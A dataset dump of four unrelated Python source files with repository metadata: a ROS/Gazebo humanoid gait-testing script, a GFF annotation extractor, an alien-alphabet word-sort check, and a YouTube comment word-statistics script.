3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | 1
|
2020-09-09T15:02:31.000Z
|
2020-09-09T15:02:31.000Z
|
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | null | null | null |
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
3b5cfaee25207c3bfe3a47339ec1bd0f8836689a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from LIPM_with_dsupport import *
import random
import subprocess
from mono_define import *
from nav_msgs.msg import Odometry
from std_srvs.srv import Empty
def walk_test(initiate_time, T_dbl, zc, foot_height):
rospy.init_node('mono_move')
print('function called')
l_2.pub = rospy.Publisher('/mono/l_hip_roll_position/command', Float64, queue_size=1)
l_3.pub = rospy.Publisher('/mono/l_hip_pitch_position/command', Float64, queue_size=1)
l_4.pub = rospy.Publisher('/mono/l_knee_pitch_position/command', Float64, queue_size=1)
l_5.pub = rospy.Publisher('/mono/l_ankle_pitch_position/command', Float64, queue_size=1)
l_6.pub = rospy.Publisher('/mono/l_ankle_roll_position/command', Float64, queue_size=1)
r_2.pub = rospy.Publisher('/mono/r_hip_roll_position/command', Float64, queue_size=1)
r_3.pub = rospy.Publisher('/mono/r_hip_pitch_position/command', Float64, queue_size=1)
r_4.pub = rospy.Publisher('/mono/r_knee_pitch_position/command', Float64, queue_size=1)
r_5.pub = rospy.Publisher('/mono/r_ankle_pitch_position/command', Float64, queue_size=1)
r_6.pub = rospy.Publisher('/mono/r_ankle_roll_position/command', Float64, queue_size=1)
# reset_simulation = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
fall = False
def callback(data):
nonlocal fall
height = data.pose.pose.position.z
if height < 0.5:
fall = True
else:
fall = False
# print(fall,height)
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
def initiate_robot():
nonlocal fall
initiate_time = 5
speed = 0.01
angles_l = [0, 0, pi / 2, 0, 0, 0, 0]
angles_r = [0, 0, pi / 2, 0, 0, 0, 0]
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
s = subprocess.check_call("rosservice call /gazebo/reset_simulation \"{}\"", shell=True)
rospy.sleep(0.1)
body.ros_publish()
s = subprocess.check_call("rosservice call /gazebo/reset_simulation \"{}\"", shell=True)
rospy.sleep(0.4)
r = subprocess.check_call("rosservice call gazebo/unpause_physics", shell=True)
rospy.sleep(0.4)
# reset_simulation()
return pose_robot()
def pose_robot():
nonlocal fall
t = 0
initiate_time = 5
speed = 0.01
rate = rospy.Rate(1 / speed)
initial_height = 0.70
body.CoM = array([[0.015 - 0.09, 0, initial_height]])
spline_1, spline_2, spline_3 = body.transition_angle([pi / 2, 0, 0],
body.inverse_kinematics([0.09, 0, 0], "Left")[2:],
initiate_time)
while t <= initiate_time:
angles_l = [0, 0, spline_1(t), spline_2(t), spline_3(t), pi / 2]
angles_r = [0, 0, spline_1(t), spline_2(t), spline_3(t), pi / 2]
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
if t >= 3 and fall:
print('-------------robot has fallen--------')
return False
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
body.ros_publish()
t += speed
rate.sleep()
return True
for i in range(3):
if initiate_robot():
break
else:
continue
t = 0
# foot_height = 0.05
step_size = .1
iteration = 0
switch_timer = 0
left_l = True
foot_origin_ds = 0.09
initial_height = 0.70
foot_last_pos = [0, 0]
body.CoM = array([[0.015 - 0.09, 0, initial_height]])
# Best results so far: initiate_time = 0.65, T_dbl = 0.1, zc = 0.6
# initiate_time = 0.63
# T_dbl = 0.08
# speed = 0.01
# zc = 0.6
speed = 0.01
try:
print(initiate_time, T_dbl, zc, foot_height)
xsolve, vxsolve, ysolve, vysolve, p_mod = LIPM(speed, initiate_time, T_dbl, zc)
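# LIPM (imported from LIPM_with_dsupport) is assumed to return the CoM
# trajectories and velocities in x/y plus the modified ZMP positions p_mod,
# sampled every `speed` seconds -- an assumption based on how the arrays are
# indexed per iteration below.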
body.time_step = speed
rate = rospy.Rate(1 / speed)
print("---------------started walking------------------------------------------")
while not rospy.is_shutdown():
odom_sub = rospy.Subscriber("/mono/odom", Odometry, callback, queue_size=1)
if fall == True:
odom_sub.unregister()
l_2.pub.unregister()
l_3.pub.unregister()
l_4.pub.unregister()
l_5.pub.unregister()
l_6.pub.unregister()
r_2.pub.unregister()
r_3.pub.unregister()
r_4.pub.unregister()
r_5.pub.unregister()
r_6.pub.unregister()
return iteration
if iteration >= len(ysolve) - 20:
break
body.CoM = array([[ysolve[iteration] - 0.09, -xsolve[iteration], initial_height]])
if abs(round(switch_timer, 3)) == 0:
if t == 0:
step_multi = 0 # ramp-up: the first swing covers no distance, the second one step size, later swings two
second_step = True
else:
step_multi = 2
if second_step == True and t != 0:
second_step = False
step_multi = 1
if left_l:
spline_h_l = CubicSpline([0, initiate_time / 2, initiate_time], [0, foot_height, 0],
bc_type=(((1, 0)), (1, 0)))
spline_y_l = CubicSpline([0, initiate_time],
[body.links_l[6].end[0, 1],
-step_multi * step_size + body.links_l[6].end[0, 1]],
bc_type=(((1, 0)), (1, 0)))
swing_leg = 'Left'
switch_timer = initiate_time + T_dbl
ds_timer = T_dbl
dbl_phase = False
foot_last_pos[0] = r_6.end[0, 0]
foot_last_pos[1] = r_6.end[0, 1]
angles_r = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Right')
angles_l = body.inverse_kinematics([foot_origin_ds, spline_y_l(0), spline_h_l(0)], 'Left')
# k = speed
if not left_l:
spline_h_r = CubicSpline([0, initiate_time / 2, initiate_time], [0, foot_height, 0],
bc_type=((1, 0), (1, 0)))
spline_y_r = CubicSpline([0, initiate_time],
[body.links_r[6].end[0, 1],
-step_multi * step_size + body.links_r[6].end[0, 1]],
bc_type=((1, 0), (1, 0)))
swing_leg = 'Right'
switch_timer = initiate_time + T_dbl
ds_timer = T_dbl
dbl_phase = False
# k = speed
foot_last_pos[0] = l_6.end[0, 0]
foot_last_pos[1] = l_6.end[0, 1]
angles_l = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Left')
angles_r = body.inverse_kinematics([-foot_origin_ds, spline_y_r(0), spline_h_r(0)], 'Right')
# print(foot_last_pos)
left_l = not left_l
elif abs(round(switch_timer, 4)) > 0:
switch_timer -= speed
if swing_leg == 'Left':
k = initiate_time + T_dbl - switch_timer
# k +=speed
if round(k, 2) == initiate_time:
dbl_phase = True
if dbl_phase == True:
k = initiate_time
if abs(round(switch_timer, 4)) == 0:
switch_timer = 0
t += speed
continue
angles_l = body.inverse_kinematics([foot_origin_ds, spline_y_l(k), spline_h_l(k)], 'Left')
angles_r = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Right')
# print("this is in main", end=" ")
# print(rad2deg(angles_l))
elif swing_leg == 'Right':
k = initiate_time + T_dbl - switch_timer
# k+=speed
if round(k, 2) == initiate_time:
dbl_phase = True
if dbl_phase == True:
k = initiate_time
if abs(round(switch_timer, 4)) == 0:
switch_timer = 0
t += speed
continue
angles_r = body.inverse_kinematics([-foot_origin_ds, spline_y_r(k), spline_h_r(k)], 'Right')
angles_l = body.inverse_kinematics([foot_last_pos[0], foot_last_pos[1], 0], 'Left')
# print("this is in main after hit", end=" ")
# print(rad2deg(angles_l))
if np.isnan(np.sum(angles_r)) or np.isnan(np.sum(angles_l)):
print("----------------NaN----------------------------")
return 0
body.set_angle(angles_l, 'Left')
body.set_angle(angles_r, 'Right')
body.get_all_pos()
body.ros_publish()
iteration += 1
rate.sleep()
except:
odom_sub.unregister()
l_2.pub.unregister()
l_3.pub.unregister()
l_4.pub.unregister()
l_5.pub.unregister()
l_6.pub.unregister()
r_2.pub.unregister()
r_3.pub.unregister()
r_4.pub.unregister()
r_5.pub.unregister()
r_6.pub.unregister()
print('-----------------walk_error-------------------')
return 0
i = 0
# while True:
# # initiate_time = random.choice([x / 100 for x in range(40, 71)])
# # T_dbl = random.choice([0.09, 0.1])
# # zc = random.choice([x / 100 for x in range(40, 71)])
# # i+=1
# # print(i)
# print(walk_test(0.48, 0.08, 0.41,0.05))
# # print(walk_test(initiate_time,T_dbl, zc))
# #
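# Hedged sketch of the random-search loop hinted at above (ranges taken from
# the commented-out code): sample initiate_time and zc uniformly from
# 0.40-0.70, T_dbl from {0.09, 0.1}, run walk_test(), and keep the
# parameters that survive the most iterations before a fall.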
| 39.338346
| 112
| 0.503727
| 1,309
| 10,464
| 3.779985
| 0.148205
| 0.060631
| 0.031124
| 0.042441
| 0.670372
| 0.617219
| 0.551132
| 0.526475
| 0.425627
| 0.425627
| 0
| 0.046747
| 0.36831
| 10,464
| 265
| 113
| 39.486792
| 0.701815
| 0.079606
| 0
| 0.517588
| 0
| 0
| 0.084324
| 0.060454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020101
| false
| 0
| 0.030151
| 0
| 0.080402
| 0.030151
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6ee084797d0ef64a6ff35e8d531e000c40a386
| 781
|
py
|
Python
|
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
extract_annotations.py
|
milesroberts-123/extract-annotations
|
dde5733835607c80d45a48e4d097cd7322db84e6
|
[
"MIT"
] | null | null | null |
from BCBio import GFF
from Bio import SeqIO
import csv
import sys
in_gff_file = sys.argv[1]
out_file = sys.argv[2]
#Add annotations to sequences
print("Parsing .gff file...")
in_handle = open(in_gff_file)
limit_info = dict(gff_type = ["mRNA"])
protnames = []
protanno = []
for rec in GFF.parse(in_handle, limit_info = limit_info, target_lines = 1):
feat = rec.features[0]
protnames.append(feat.qualifiers["Name"][0])
protanno.append(feat.qualifiers["Note"][0])
in_handle.close()
#Write lists of sequences and annotations to .tsv file
print("Writing annotations to %s ..." % out_file)
with open(out_file, "w") as f:
for protname, protan in zip(protnames, protanno):
entry = [protname, protan]
f.write("\t".join(entry) + "\n")
f.close()
print("Extraction complete.")
| 23.666667
| 75
| 0.713188
| 122
| 781
| 4.442623
| 0.508197
| 0.027675
| 0.03321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008915
| 0.138284
| 781
| 32
| 76
| 24.40625
| 0.796434
| 0.103713
| 0
| 0
| 0
| 0
| 0.123386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.173913
| 0
| 0.173913
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6ee92ffbfcbd13c35e3bca05e4f1adb80adce8
| 1,657
|
py
|
Python
|
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
alienLanguageSort.py
|
syeddabeer/0projects
|
e132628f3693ed40c5ea9055a6c79f8266196bae
|
[
"Apache-2.0"
] | null | null | null |
"""
In an alien language, surprisingly, they also use English lowercase letters, but possibly in a different order. The order of the alphabet is some permutation of the lowercase letters.
Given a sequence of words written in the alien language, and the order of the alphabet, return true if and only if the given words are sorted lexicographically in this alien language.
Example 1:
Input: words = ["hello","luther"], order = "hlabcdefgijkmnopqrstuvwxyz"
Output: true
Explanation: As 'h' comes before 'l' in this language, then the sequence is sorted.
"""
class Solution:
def isAlienSorted(self, words, order):
order_map={}
for index, value in enumerate(order):
#order map is created. with letter as index and position as value.
order_map[value] = index
for i in range(0, len(words)-1, 1):
for j in range(0, len(words[i])):
# first word is similar to second word. but first word is longer. like apple, app
if j >= len(words[i+1]):
return False
if words[i][j] != words[i+1][j]:
if order_map[words[i][j]] > order_map[words[i+1][j]]:
return False
break
return True
words1=["hello","luther"]
order1="hlabcdefgijkmnopqrstuvwxyz"
print(Solution().isAlienSorted(words1, order1))
words2=["word","world","row"]
order2="worldabcefghijkmnpqstuvxyz"
print(Solution().isAlienSorted(words2, order2))
words2=["apple","app"]
order2="abcdefghijklmnopqrstuvwxyz"
print(Solution().isAlienSorted(words2, order2))
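For comparison, the same check can be written more compactly by translating every word into a tuple of alphabet positions and letting Python's built-in tuple comparison do the lexicographic work. This is a sketch of that equivalent approach, not part of the original file:

```python
def is_alien_sorted(words, order):
    # Position of each letter in the alien alphabet
    rank = {ch: i for i, ch in enumerate(order)}
    # Tuple comparison treats a prefix as smaller than its extension,
    # which matches lexicographic order, so pairwise comparison suffices
    keys = [tuple(rank[ch] for ch in w) for w in words]
    return all(a <= b for a, b in zip(keys, keys[1:]))

print(is_alien_sorted(["hello", "luther"], "hlabcdefgijkmnopqrstuvwxyz"))  # True
print(is_alien_sorted(["apple", "app"], "abcdefghijklmnopqrstuvwxyz"))    # False
```

Both versions run in O(total characters); the tuple version trades the explicit early exit for brevity.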
| 35.255319
| 182
| 0.631261
| 211
| 1,657
| 4.938389
| 0.417062
| 0.034549
| 0.020154
| 0.024952
| 0.143954
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016461
| 0.266747
| 1,657
| 47
| 183
| 35.255319
| 0.841152
| 0.418226
| 0
| 0.173913
| 0
| 0
| 0.114017
| 0.08159
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0
| 0
| 0.217391
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 9e714ffa033577119fdde50aec9e7885109ed239
| 3,524
| py
| Python
| osna/tmp/stats_Youtube.py
| tapilab/elevate-osna-news
| bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
| ["MIT"]
| 2
| 2019-08-14T08:17:33.000Z
| 2019-11-13T18:03:11.000Z
| osna/tmp/stats_Youtube.py
| tapilab/elevate-osna-news
| bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
| ["MIT"]
| null
| null
| null
| osna/tmp/stats_Youtube.py
| tapilab/elevate-osna-news
| bffe6c9a8269ea1afba0d998b79c8db1b842b7bf
| ["MIT"]
| 2
| 2020-05-26T05:11:15.000Z
| 2021-10-08T08:01:21.000Z
|
import pandas as pd
from collections import Counter
import re
import sys

def tweet_tokenizer(df):
    # Split each message into tokens, strip digits/punctuation, drop empties
    tokens = []
    for m in df['comment_tokens'].astype(str):
        for tok in m.split():
            tok = re.sub(r"[0-9\W+]", "", tok)
            if tok != "":
                tokens.append(tok)
    return tokens

def Mystats(directory):
    df = pd.read_csv(directory)
    # 1: unique users
    ids = df['social_id'].unique()
    print('Q1:Number of unique users:', len(ids))
    # 2: unique messages
    mes = df['comment_tokens']
    print('Q2:Number of unique messages:', len(mes.unique()))
    # 4 and 5: unique words and total token count
    word = tweet_tokenizer(df)
    print('Q4:Number of unique words:', len(set(word)))
    print('Q5:Number of tokens:', len(word))
    # 6: most common words overall
    print('Q6:50 most common words:', Counter(word).most_common(50))
    # 3 and 7: per-ruling message counts and most common words
    # (the original repeated this block once per ruling; a loop is equivalent)
    df1 = pd.read_csv('D:\\news\\training_data\\factchecks.csv')
    rulings = ['TRUE', 'FALSE', 'Pants on Fire!', 'Mostly True',
               'Mostly False', 'Half-True', 'MIXTURE']
    for ruling in rulings:
        subset = df1[(df1.site == 'youtube') & (df1.ruling == ruling)]
        print('Q3:Number of users/message in class %s:' % ruling, len(subset))
        pd1 = pd.merge(df, subset, on=['social_id', 'site'], how='inner')
        word1 = tweet_tokenizer(pd1)
        print('Q7:50 most common words:', Counter(word1).most_common(50))

if __name__ == '__main__':
    # The original called Mystats(directory) with `directory` undefined;
    # take the input path from the command line instead
    Mystats(sys.argv[1])
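The core pattern in `Mystats` is an inner join between the comments table and the fact-check table on `social_id` and `site`, followed by token counting over the matched rows. A self-contained toy sketch of that join; column names follow the script above, and the data is invented purely for illustration:

```python
import pandas as pd
from collections import Counter

# Invented toy frames mirroring the columns Mystats expects
comments = pd.DataFrame({
    'social_id': ['a', 'b', 'c'],
    'site': ['youtube'] * 3,
    'comment_tokens': ['fake news story', 'true story', 'fake fake claim'],
})
factchecks = pd.DataFrame({
    'social_id': ['a', 'c'],
    'site': ['youtube', 'youtube'],
    'ruling': ['FALSE', 'FALSE'],
})

# Inner join keeps only comments that have a matching fact-check row
merged = pd.merge(comments, factchecks, on=['social_id', 'site'], how='inner')
tokens = [tok for msg in merged['comment_tokens'] for tok in msg.split()]
print(Counter(tokens).most_common(3))  # [('fake', 3), ('news', 1), ('story', 1)]
```

Only the comments from users 'a' and 'c' survive the join, so the counts reflect the FALSE class alone, which is exactly how the script separates vocabulary by ruling.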
| 34.54902
| 74
| 0.607832
| 511
| 3,524
| 4.105675
| 0.191781
| 0.076263
| 0.045758
| 0.064824
| 0.584366
| 0.584366
| 0.522402
| 0.491897
| 0.491897
| 0.4347
| 0
| 0.042576
| 0.206867
| 3,524
| 101
| 75
| 34.891089
| 0.70805
| 0.004824
| 0
| 0.282051
| 0
| 0
| 0.285061
| 0.01114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.038462
| 0
| 0.076923
| 0.25641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|